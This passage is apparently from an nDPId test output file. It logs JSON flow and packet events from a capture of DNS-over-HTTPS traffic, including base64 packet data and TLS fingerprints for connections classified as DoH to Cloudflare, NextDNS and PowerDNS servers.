{"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":946739378610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739378610,"pkt":"REREREREZmZmZmZmCABFAABoLytAAH4GiGoKAAABaBwcIoO8AbvZKqYtoyMiIFAYAfVFVQAAFAMDAAEBFwMDADUQNuPt6m2nY9MgXiEHZRB5L+gDtuMOMxUUfy82Uox32sOXoFpXHp3NUSfU3Rmr6gABtUijkQ=="}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739380697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739380697,"pkt":"REREREREZmZmZmZmCABFAAFIsgNAAH4Gh+8KAAABAQAAAdIqAbvH6z5LSWNp6VAYAfbC9wAAFgMBARsBAAEXAwNccnLckexdP3Wz7tsKiknbwUElui2FZGSKODu9LnFkjSDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zLmNsb3VkZmxhcmUuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIM\/CjtFE6\/BfV0qVOcMMUIig11i56\/tpHaQ1FlARye8w"}
00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":946739380725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2892,"pkt_l4_len":2858,"thread_ts_msec":946739380725,"pkt":"ZmZmZmZmRERERERECABFAAs+VjZAADoGHccBAAABCgAAAQG70ipJY2npx+s\/a1AYAELM7QAAFgMDAHoCAAB2AwNqFtv3xWSYHbL\/TEVcxTgtPyY5syhT1Ar0J7GcYm2olyDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7BMBAAAuADMAJAAdACABwPRBPqMH6tP2UgTdU38yy4IBdMrNy3Y26n6nkJgoEgArAAIDBBQDAwABARcDAwqMAOf8HgLdG4eR2zQrlVcXNJK6gSgekjnntDDuH\/5mItzTS2PjuRorCZtp1e456Yzxd\/c9Pjo0KqOApsf0Oet3HLAxOPX\/4mq0oqPJv6\/pWYh6XkL49x7kn3sA8FLizWIik5oy6pRjSBWFf6tqxUO+Djt17wQK6yhMls9hUq1ClHJUh6Qn273NZpiWOuHCd9wGeCfeInHvS8qk0EqIdne\/5O3+AKgM\/cALapdKbBhIoAyrPwqC2hLjGuasAzda3QO\/+ESHum\/F9d6o\/5K+8IYpY8o8qtVJ6Drg8futbzGhAS87lZYW5UeuuFH05CzhM6cODq7gNj4mbPjTJ5ApTRpwsXEw0cwu6tAiKdHBHu4s131JOS1nhPpDpOs1W8FqhOijP5pChk7nVfwQ9Bu1xYiYmTlZWYP4bC0IhVSltsY4+ffd9etk6QNu1u5Seoh1QaWRe4DU8GYPqDdj9ywHuBnTu\/kdk6yObRcYizbhLyG5JiQSyxA9bv7iPMzOSI\/oPD6Rw4c6cy1qJywZ7F9o\/W7KUU6pYYhqWRcunfBOy2cedxZtVaWxcAQGD7VjEr1GjI\/ndJEL6DV\/vUO5PSsHgdX\/GScVrZdS\/KHwHxAHOv1BpKxNHl+ElIeVfCJc4tBsNkoBf5+COT0BV1cqDq\/0TqIcpVxlMv3\/7JDTZZTI\/wMxcbTZkEC580\/OL4P7o7ZBv1lVciiiGUxirK0Wn0VmKVkOPUH1VVDEVtxbspQjAQAudOqLnKMivdYYnLWKcLFjjfuE8XwFn1JkF2YyGgtdu+0wxe7V3QdQyeX6wSKDfGOBn1RHTiZSQJLrjf\/MjK6PK6+6dmcX2K\/Nos\/HKCWzOCSGOxH6pgvl94s\/0dDawx7iAmW0aKHP7fN\/Qsuj7qBRlYmeX3wDSe3ACAyO8PJtifBKRUnx+i44zF\/TEZT9\/0f9hj1yXYZhM4IttxvCtS3N7k187lM2JB6HB4DmePSpA5UfxEPRq71lNWUsDLAAiN3ekJSKoZ7PUpp\/6SJsuSwyITjf4EqBLpeWL9MrWeNXoUk5W1F7hWZmXxUwbc9PMEuirTVJUIeKJcMT3hUo1x6K9jQ+3H\/3FjLuAvSaGN20\/JlmWzUhH2c19MbTsBdNUca8p5h9ftAYWxNZFi+BPME56GacRIjusosOaDm6TM6NIeJtcd5nQ0Y6NbfwEe7MdB0akdNH1SZ5FpPCUXE+5h9eWmGzxT6gCZx6qvA46+kjmSPa8Cj85dDYPgUItxPMDzQDmcDkFl4Jtoqp7CsVbgDs2FaRSNSCg+ZMEThJQx0\/Aqz+vGM8Axcf5cpBgdqJqmkgft7WVM6LgxM0bWa6ReLOTbftdrjvt51qS7oW8iSFCaAMyVHnB9nNub1rCB71JGnHgmpLaDriPHmvZHyXG+tF3YYxqKFpVLMzSELDqif9S44Mrb9ZjnIWKvGQryM\/QSKoEg5X7zctl4vxNBFap6BlJhqRr3fm7FAc37N2CcUPqfx3Q8d+odOusP4Ls3Xq2Sur1UmBSNW9zqMAV9eCaagN4swiO+HX9D1JhZPxXTW9QWyDXi2zI1HI7LUB70fqeJS7u5T5BooNTQeoNzZVCvWOXWLt+ZiIbxI46okrDHFQXi\/x2G\/UqXdfkOEinNyh78FxOnrKcOtvfU1vQdaz7Z3d1S6XTGxIbp7Avs8yqCBkfYYx0okhQoRYkFViIAKhs8EJ22ENemkpy\/xMNRrY7HXIqAF0plC7ASy6aRPBxNQLpe6Ed5IaeUHDV+pWuEiLAgXAO3BIyMmN+dKwyJRSjGew81SAxYCXzqNGK2p7GdpO\/XP0maghqEG1aIROtTBX2ArldnERnpk4NXjDbfgsSkzP20ClfXeN4yjZTmAjINRHsDFyBG2kVPsbWM6bJ6sXUqNBkjHzH8mUguB01CThNReqO2rGsLiKr5qTMAwxKxjfEdoEJ+OdtfVMDr3B0PaBDiW6NDXICwJTMjrTiHsqLMySrS2T3BXPc1yBL+jDROuKYyhTZQzCA6ktzSKC6wAMC\/2RMbHnV4JUqSuJoXnZI1jiGQfafDh9qm0ZR91\/Upntxs\/kWZ9Zofn9x4gsvGL94XY2stn+kYJ+lpR5T38ZBRBOsXu8bAGsKAP+3wt7PlEML8VYdMSv1Y8XhaZ4vQZT4mxjokM8a+\/vbBm5OFXEOAsw3UpeMp5Pdlywdfks9xANyyHcs7XyT+4nzRjV93W+RbJVksh761\/0CsogB0Bf4AeRq1b8bSy2mVWD\/C9oBFlc4PSw+jhx1uKdorr8amCiJ2bwSUXaBBKYKGtf3eKS0Vrr8DWhAzmAupA8TRMiBwDgWH\/pSpuuBxo4fKT36lTdVMpKIp966xzVRYeAdyJ8dQTy5jeDQL1o\/K9FAvaIxIHdqy3Ai9UpxdTmYwoZXk1RGWSFQPWK2eEqydFLHkwLiG2A9OQ8pCYrZlqHUn1snev7fQAbwrXFOXDJskS+CYp+0GQvu\/Fu37N\/vYvDe9yQ2BjQyb\/Aq\/mNLHkdVzTu+oIIX6og2jNse2SlImfdMuiBssQFePUieOP3nrkgegmZDkJvZU8\/IJtyIPGhvEr4wy0KRjmbk1R5TV1oh+Gvyump800hgoeZ6yINLishVXjkSrZbw30TzgVyIHMXbfVH5cMb\/otpjX8v74ViZ68NiQoVQGCiu9Qccb9jITaHI7YqId83HAhD0Mgcvql8x4riVhsLhWBp7KARZMNylg6FCWQzYhkomLcDqOeaHr\/i3Kucv0p5GzUzkUvhbOyyBarVy1r5EY3Ff\/LeERfwiWeu9JMjSlW9a76FWzNvpbjiVQvAXjpJS+B6vW0S676\/2F\/QVlBvmv\/1e3jfE46NEORC\/KvStAu1+NCVXXkgYYjYaavSuMFqEVMBLpNt3pqmD175kYHYjG6R6TDv0nmjRk\/fdkSOg4ydMi2g43e05SDICPCTBrKL+H8pdmtKEp3WxofXZCtNR+ckTvaTdfJXZMWJbImpAgp0edudixTNqo9z3f5BRBQ1U170EzzThEQIMmS6RHUG4MBWpfatZDm+5s5WqxzAc+f48z+5\/Rjpm1MjT7FAj2QOS2mS1pZuw8jR7f9mlmDHlYUa7yULFKz+EOcDFjny+TGuKCw6tBmvp0uAgOgbWkR3PGwLQlgJNN5qcasz\/DdlRFFRc1kdK872NuK41RPGMSa34kfvjKckPj3jn4ntsF1i9WcRtXZaTKddZmAVoibh8F7o+\/2BqWfWHshjLjbv2UXOWt85MGeIvvR+JAZ4lQKxhMp4ApqHsqTnv9vjAIsk+AJwp0L3kf96BrAf5lxFwLByeiu2ScazZunSG5IvLxJ2cCZzgYOFm\/xSZPCmFYvKNJw727A0qH0cpDBKVk4Z5vvRen3ROFERblATF0imHD72RVGcQ\/rMrcnTAneuS+605QxQwV5cyssndlHujOT5cJjQwi4Me+A9i\/U+gGMItbvzyiV\/bH\/dnSH\/6+REX1pIGyZTP+9n2MXLAZnibrKAMIRfK2TIfrOe5jmJF94vcBm\/\/5ycPeTZII89RYTOm\/OYD7dCL\/Fj+p2ZF9GMMq1KmH\/crTCIqHICoTep9ezhaM3lurJnltFyZNv3oliEoTfl"}
00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"thread_ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":946739380727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739380727,"pkt":"REREREREZmZmZmZmCABFAABosgVAAH4GiM0KAAABAQAAAdIqAbvH6z9rSWN0\/1AYAfXCFwAAFAMDAAEBFwMDADVke5XeBLKUZMMwsdywo3cwWM6dcwvPxEIBrrKuQwAVECVGBCt8L\/1vmMSczXlzhvKSsbEzJA=="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739380870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739380870,"pkt":"REREREREZmZmZmZmCABFAAFEC7lAAH4G5eQKAAABLVocAII6AbvzwYfFjc3Z3lAYAfYLTQAAFgMBARcBAAETAwME0sG+tMqbxpRl1DV8Z2dnX5LfzpIiHTt74xC1bVbZqCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLm5leHRkbnMuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAghy6XniNnPGDj9u0r7tzchu6tmfTKqCDkZge3YRdGMjI="}
00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":946739380903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAXUAxlAADQGM\/UtWhwACgAAAQG7gjqNzdne88GI4VAQAnmV4AAAFgMDAHoCAAB2AwNSUVDmrRSBFJr3VlpPTiOBfna69z7Ip3AgaZ4JY8XZPCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvhMBAAAuACsAAgMEADMAJAAdACBgLhCqxZDxBYT0wty93r8WAtFFYd34UV+f0SYd9yF0RxQDAwABARcDAwAgNdJG6I7V9ce0uN\/W8MyCm58pWjfsCFZXXJnMcWaU4P8XAwMJ4l4xzn1tklFeMfXUSkilkOHkR2CrV0Fk61C4hUjayiVX3XCUzF\/nVmk3NsjsUuGQs+ELPFl7aLMJpdeipyb\/BRKM7DDOdlmSjSZFpz3sI+4Ap1vb842GKpbBCp1KIgOgnmXfMMwnL4uKzNN2+XpL8V9LwuMNROahwk9tJrSx3BZQnvVy5qktKVugzkoTSb9fPpFovSjkUbQUBQuFWl2cxLyQBO6gjWiaDBpgoqREkqW2UGurTHpBXCvX7xTK+SGfs3VLNGPL\/jM509wXezmGXrBZolGpSBcCmwqP5AGjSUkJQ2KFF8\/5I5DLe1rWw\/7rCzdCJgW7dwItPpQigYvEpUhaTQyjzhLtXm4Br1gtr+Iuf0HPHYTCtm1Z9061ijlO7AesYAg3NSX4lpTeBeQNzqwAGQi0kxU+8BsfAI4uhNY4fwD\/tgZRm00kCDUGr0Hw1O0\/9wcQo2OrT4hVI8sBPv9rovACUd1xTXQBUu4c2UNVQr\/DAwgtr3oGHXN\/yf6hHksHqaO6ThyUELGPZgyTaAEJeYSlV\/UuFXosuXrXk+4M4bQmtm8xQA\/hPEgZw03CxD+XIQ9CziCJc2Lx3r4h2FdBiMwzohldpvHSBUXM2GuHl07Muv9yz1FfyzqYAimU2llIffa6XcR6\/N9ex4PCYrVYeRifJmT\/hN608lQ56Pm4ckRgIW72lS0ILwL91eG\/PWLw1TWr9OHqib8dqID1N28WvnDQAc1WG+OfvFA5Lx7KtiZ9\/3KI7f7RCYG\/5anpOjN3Yvo+yrHT\/\/9yxTpA2EDhXmw1I+drMKCfdVXEwoRqrQDXQ3qu16NE+piWO4zYtxH6MrZOf5GKUoqj85zhZkJ6n3Wtdfmw0p2w7uWnPZarz2kRT1hGv0H7uWAwQsIO2witiCTCAX0VhCKqX5eg9HlVQxEJ8e6aZG6udk28L+hlu2DjHm2cK3LT5siYCZ+61rOCmuWYzAzB4PZwDYNVRnV0GsHgMCnZc9N4\/ighhHZqiYL81av1zekzo7Qcc39eQmJB1\/vhuqI4+c3vKnv7ROdK1hsAX7hP\/VFs8H8ZF9FxFv36aFuAu1HQxIxhZTCwXDQcu5TzVx1PL5uguNjR7pwef7T5COi4aTCL27yji1k+uS4xQgf7uM7lfjr7UlwSz76e6z\/NdrgDABxN2pYomW51+xON8iXDOy0cXgxInpylLI6lmV7hJWGh+rssjjMTkzOSia\/tb6HN8MDXz8ND7qC4wdRBL+K2XXzk7CxXSZKHbU7oBKE3VuTcSRmBvFAj4jzbuAW9nVI5Yw9M7KxJ0oNCiAer+7rkuV1\/dCwQt\/7\/zkSRGAemKSurrkjoqozLCUcuNRu2YlaJLAc\/PeEJmeHXWSos8ReOKG9libwm6aBbFjBhBGqk11oBFxYMJe3fE8zx0cKng5v141kUW5K8KykDBQPlm38itlnDfJBFaB9Jn9F1Dk+fc1GMvxAKNX1KD189yDAOfdy35szVs+4vU19xgaD3Asb+3zoIgGeHaF3v5zAsODf1V7zFmYGD1A5VyodE+SZcg8yBGqWdCjN6Dq7+yW5n4whEBATh9+W8PK0m19STC9EnY\/KFQ8CMbZglLaqGH9UHLlwuaNZUfgFyrj24dAMianUUp6I5pp2CbweoDVXgQfGbkHcfYC\/73I2CAYRQxi4XFXP\/UJ7vD4Iv633KLKMEpQYwdikhrjOP"}
00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02374{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":946739380903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1467,"pkt_l4_len":1433,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAWtAxpAADQGNBstWhwACgAAAQG7gjqNzd+K88GI4VAYAnlzfQAACEkFkdj1Us7HE6XsQGxneQX\/pTaXJNHBzTBwjbjFH2PSLY9gxHervwko9HwLHhkgWdiRotlJENzv3dIlV0Q25g7GanzLzAoq\/bJLnF1bxRf0nf8R7xwqHIiEyWrnrfJqukts8v3m8MMBnkDAGd5xOmtynEVhFSJmjPZeWlanPH3W\/gPE9eVpcr\/bC8aD31d4wHJftv6KUYCRDzDXbCSoL\/6F7bgfENCEavhYW2LuID8zVPN+yKzb3WDD71Bfm\/QzlUMFQuZM5HbG0c7uIAOOAxkawVYPNiqL2TFCk1ynXFgmF4gXvbL\/HYrDLFRfjW4de\/NkjjSai08L+PfACua2q5oTvt2qGJPeolVEHsMmZEjEwazNhDwGqFKG5OP+F531r01cH7BTJcZ05QE7qXBrbvqwdtdoGPvG50ZEjeoenLq9i4bYfhTR7gqdrp+nT5HdXBlwZ3BA7TNBvRO28EIkDbwnbkKR1uAOgeHpmVvBpmpiphn4DYQZvVFKBDcAp0CgnjFhQ7BpU5nrco2WQPx+1Dj+wVwuk8wQg4nsuaxF9uoh5BJPTUJDd+oGcKzJnMyQnjiAungCkABFhOHccfPCI4WdjBjLMLNqgoxHw6DJHYylEKtOB9OnnXDF2J7Jvo9Dz26D1KrzmXsDWoLDC1fC96J8yd93fYvTZHskQxfY50BQIAKcBIdr8K4+MowCcaLlKXgQ2BvySvU9B5mJVdaqmTLF1fzesL+WRRK51q7IAwLh77wssc7jt76mm0H3PAWysYvmp\/NCiSKfjKaaLkm9x2NoEkekjBVCT4zJZaY12lyFWkBUvQQdolUu\/1tiRf86EnZ+MpspCpIhymi\/IUp68M\/Eb+2ljNKVmV1Er+pytZKFdhm+LxFZQDgPvwZts5tJVArrKTXEX7mbMUyNCFK87rJIQtF3h75H2QQdF8Dne8XAGsXDDnswycmS8W4DR2ei8Mvw6EchukCH49+5iX+zWw8yLNfbuXrdtwpsTWibehpgDGJwJ32GJ3PUhcT2O8ckRkT01hA4OhJ5s8FVi9G4sK5PSDUaW\/FVD5mXCOlbG6fI8ep93Cq318IKEa9gHWkRIcGP1KNeJ0vqPt6W+fiprWcAT+y38\/pHS\/DIldwWXxoakgp8kEgE10+BHsdUGoLtM0vHARs9JoXziCU\/gwCe4xJoYT7yIuKPLoyyOJzupzLZV+Yx6GthfYTU5x9FRZbuuSu\/4e+BWK3Ph42jg8FFm3MjO7iYnNl4v1+ChQKVR7XODNZWDH3jwqcZ8qhbkD9u5SI6j\/BA1C0rUPcBjh1+6XjoNgW\/MuFBBpUx0b9PcVFriOAhMdQziZ17xbnHnF7nwzD4ltsyPw098+Y62NYg0g7ZzmYgr7Bp\/OQu72rrzto9ZurPdNMKCU\/kuUSQfJNRXnpCKpphgwF89PQmt81ZhzDDg8jGUYjA+eCwP5b5c3W1mHz2rbpTYaJ5WAEPawg7kcD\/0daljt7SoSzY0j1SW+z8PqelVSwUwhQf5v+dUBJntKDTvIA8dd3\/P5RebSAS6fwWCMpEa2Wpe0EbiTKfmmwomuAMmkjN4HlloVMdOTeEonHISxyYlgXipaeXT8CPFbuFXE4ejDU2aTkR9\/ZIbgoZdx7IXmaK+NxS9KICVTe0LPka0QmobSr15yArkyNHaP1EjswXAwMAYdZTBGnK4vcmbufHHRKWT+kPKyQO98Boq8AW86\/7q3c0DIh4T2TuGPAeaW+ueW75g7BJBBU7YuGFvnEEgi07qTSBXDL1UISZX8PwWOHA6mln36hZp5MmWU+JESIy2cQgYeQXAwMANQq+Suu4\/zFTPT1s4z\/CUiKzLUAWytPdwzfRZmXCp50PDxLOSYvzo75EbO+96Njs+ccRggY7"}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739385090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739385090,"pkt":"REREREREZmZmZmZmCABFAAFGrgFAAH4GLMUKAAABiJDXnsvQAbv3Oz1sep96IVAYAfYiJAAAFgMBARkBAAEVAwNZtcLiAhjzwZoFuSzepzhVh3+I+642bR2Bdc1go+HJvyB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG9oLnBvd2VyZG5zLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBPoxVI1tXnUcUqsbORFpVub7e\/4DvFTpQM4hnCin1UEw=="}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
